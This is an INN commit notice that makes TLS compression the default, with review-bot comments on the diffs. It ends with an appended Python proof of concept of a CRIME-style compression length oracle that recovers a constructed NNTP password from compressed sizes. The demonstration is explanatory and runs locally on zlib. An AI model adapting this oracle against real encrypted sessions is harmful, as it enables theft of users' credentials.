INN commit: trunk (4 files)

INN Commit rra at isc.org
Sat Jan 10 14:24:36 UTC 2015


    Date: Saturday, January 10, 2015 @ 06:24:36
  Author: iulius
Revision: 9784

Enable TLS compression by default

As the CRIME attack is not exploitable in NNTP, do not disable TLS
compression by default.  No vulnerability in TLS compression is currently
known as far as NNTP is concerned.

Modified:
  trunk/doc/pod/inn.conf.pod
  trunk/doc/pod/news.pod
  trunk/lib/innconf.c
  trunk/samples/inn.conf.in

----------------------+
 doc/pod/inn.conf.pod |    5 +++--
 doc/pod/news.pod     |   12 ++++++------
 lib/innconf.c        |    2 +-
 samples/inn.conf.in  |    2 +-
 4 files changed, 11 insertions(+), 10 deletions(-)

Modified: doc/pod/inn.conf.pod
===================================================================
--- doc/pod/inn.conf.pod	2015-01-10 14:12:40 UTC (rev 9783)
+++ doc/pod/inn.conf.pod	2015-01-10 14:24:36 UTC (rev 9784)
@@ -1073,7 +1073,8 @@
 =back
 
 Finally, here are the parameters that can be used to tighten the level
-of security provided by TLS/SSL:
+of security provided by TLS/SSL in case new attacks exploitable in NNTP
+on the TLS protocol or some supported cipher suite are discovered:
 
 =over 4
 
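Review bot: the new wording of the sentence that introduces the hardening parameters is hard to parse ("in case new attacks exploitable in NNTP on the TLS protocol or some supported cipher suite are discovered"); the two modifiers are stacked so the reader cannot tell what "exploitable in NNTP" qualifies. Suggest: "Finally, here are the parameters that can be used to tighten the level of security provided by TLS/SSL, should new attacks on the TLS protocol or on a supported cipher suite that are exploitable in NNTP be discovered:".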
@@ -1086,7 +1087,7 @@
 =item I<tlscompression>
 
 Whether to enable or disable SSL/TLS compression support.  This is a
-boolean and the default is false, that is to say compression is disabled.
+boolean and the default is true, that is to say compression is enabled.
 
 =item I<tlseccurve>
 
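Review bot: the I<tlscompression> entry now states a default of true without any rationale, yet it sits under the heading that presents these parameters as the ones used to tighten security, so an administrator who knows TLS compression is widely disabled will not know whether INN's default is deliberate. The reasoning only exists in the commit message ("the CRIME attack is not exploitable in NNTP"); put it in the manual, together with which value is the tightening direction, for example: "The default is true because the CRIME attack on TLS compression is not known to be exploitable in NNTP; set this to false if you prefer to disable compression anyway." It would also help to say here whether the value has any effect when the OpenSSL library INN is linked against provides no compression support.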

Modified: doc/pod/news.pod
===================================================================
--- doc/pod/news.pod	2015-01-10 14:12:40 UTC (rev 9783)
+++ doc/pod/news.pod	2015-01-10 14:24:36 UTC (rev 9784)
@@ -19,12 +19,12 @@
 =item *
 
 If you have been using SSL/TLS with B<nnrpd> before, be aware that the
-default value of a few F<inn.conf> parameters have changed:  SSL/TLS
-compression is now disabled by default, the server decides the preferred
-cipher, and only TLS protocols are allowed (using the flawed SSLv2
-and SSLv3 protocols is now disabled).  If you want to change these
-settings, the respective I<tlscompression>, I<tlspreferserverciphers>,
-and I<tlsprotocols> parameters can be tuned to your needs.
+default value of a few F<inn.conf> parameters have changed:  the server
+now decides the preferred cipher (instead of the client), and only TLS
+protocols are allowed (using the flawed SSLv2 and SSLv3 protocols is
+now disabled).  If you want to change these settings, the respective
+I<tlspreferserverciphers> and I<tlsprotocols> parameters can be tuned
+to your needs.
 
 =item *
 
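Review bot: grammar in the retained part of the paragraph: "the default value of a few F<inn.conf> parameters have changed" mixes a singular subject with a plural verb; write "the default values of a few F<inn.conf> parameters have changed". Also, dropping the compression sentence leaves no upgrade note at all about I<tlscompression>, although this same commit flips its default from false to true; anyone who set nothing and relied on the earlier trunk default of false will silently get compression enabled. A short sentence such as "SSL/TLS compression remains enabled unless I<tlscompression> is set to false." would close that gap.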

Modified: lib/innconf.c
===================================================================
--- lib/innconf.c	2015-01-10 14:12:40 UTC (rev 9783)
+++ lib/innconf.c	2015-01-10 14:24:36 UTC (rev 9784)
@@ -233,7 +233,7 @@
     { K(tlscertfile),             STRING  (NULL) },
     { K(tlskeyfile),              STRING  (NULL) },
     { K(tlsciphers),              STRING  (NULL) },
-    { K(tlscompression),          BOOL   (false) },
+    { K(tlscompression),          BOOL    (true) },
     { K(tlseccurve),              STRING  (NULL) },
     { K(tlspreferserverciphers),  BOOL    (true) },
     { K(tlsprotocols),            LIST    (NULL) },
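Review bot: the new default agrees with the sample file and the POD in this commit, which is the main thing to verify for a default flip; the remaining place to check is any test fixture or expected-defaults listing in the test suite that records tlscompression as false, since it would need the same change to keep the tests green.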

Modified: samples/inn.conf.in
===================================================================
--- samples/inn.conf.in	2015-01-10 14:12:40 UTC (rev 9783)
+++ samples/inn.conf.in	2015-01-10 14:24:36 UTC (rev 9784)
@@ -140,7 +140,7 @@
 #tlscertfile:                @sysconfdir@/cert.pem
 #tlskeyfile:                 @sysconfdir@/key.pem
 #tlsciphers:
-#tlscompression:             false
+#tlscompression:             true
 #tlseccurve:
 #tlspreferserverciphers:     true
 #tlsprotocols:               [ TLSv1 TLSv1.1 TLSv1.2 ]

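The commit's rationale rests on whether an attacker can get chosen bytes into the same compressed TLS stream as a client's credentials and then observe the record size. The following is an added example, not code from INN or from the committer, that shows the CRIME-style length oracle on a constructed NNTP authentication line; zlib stands in for TLS-level DEFLATE, and the password, the AUTHINFO prefix, the candidate alphabet and the padding trick are all assumptions made for the demonstration.

```python
import zlib

# Constructed sample traffic (not captured): the credential line nnrpd would
# receive from a client.  The password is a hypothetical value for the demo.
SECRET_LINE = b"AUTHINFO PASS hunter2x\r\n"
# The attacker knows the protocol syntax; only the password is unknown.
KNOWN_PREFIX = b"AUTHINFO PASS "
# Candidate password bytes; b"\r" doubles as the end-of-password terminator.
ALPHABET = b"abcdefghijklmnopqrstuvwxyz0123456789\r"
# Bytes 0x90..0x97 never occur in the text, so they never create an LZ77
# match, and each costs exactly 9 bits as a fixed-Huffman literal.
PAD = bytes(range(0x90, 0x98))


def compressed_len(plaintext: bytes) -> int:
    """Size in bytes of raw DEFLATE output, standing in for a TLS record with
    compression negotiated.  Z_FIXED forces the static Huffman table so the
    bit cost of every symbol is known; real TLS compression uses the zlib
    defaults, which makes the signal noisier but does not remove it."""
    z = zlib.compressobj(level=9, wbits=-15, strategy=zlib.Z_FIXED)
    return len(z.compress(plaintext) + z.flush(zlib.Z_SYNC_FLUSH))


def length_score(plaintext: bytes) -> int:
    """Sum the compressed size over eight paddings of 0..7 extra 9-bit
    literals.  The eight variants hit every bit offset modulo 8, so byte
    rounding cancels: the sum is the stream's bit length plus a constant,
    and a single 8-bit literal more or less is always visible."""
    return sum(compressed_len(plaintext + PAD[:k]) for k in range(len(PAD)))


def oracle(secret_line: bytes, attacker_text: bytes) -> int:
    """What a network observer learns: the size of a compressed stream that
    carries the victim's secret followed by attacker-chosen text."""
    return length_score(secret_line + attacker_text)


def recover_password(secret_line: bytes, max_len: int = 64) -> bytes:
    """Recover the password one byte at a time.  A guess that extends the
    match against the secret line replaces an 8-bit literal by at most one
    extra length bit, so the right byte always yields the smallest size."""
    recovered = b""
    for _ in range(max_len):
        scores = {
            c: oracle(secret_line, KNOWN_PREFIX + recovered + bytes([c]))
            for c in ALPHABET
        }
        best = min(scores, key=scores.get)
        if best == 0x0D:          # terminator won: the password is complete
            break
        recovered += bytes([best])
    return recovered


if __name__ == "__main__":
    print(recover_password(SECRET_LINE))   # b'hunter2x'
```

recover_password() reads the constructed password back purely from compressed sizes. The attack needs exactly the position that the oracle() signature makes explicit: attacker-chosen text appended to the secret inside one compressed stream whose length the attacker can observe. Whether an NNTP deployment ever gives an attacker that position (for instance a client that relays untrusted data over the same authenticated connection) is the question to answer before leaving tlscompression at its new default.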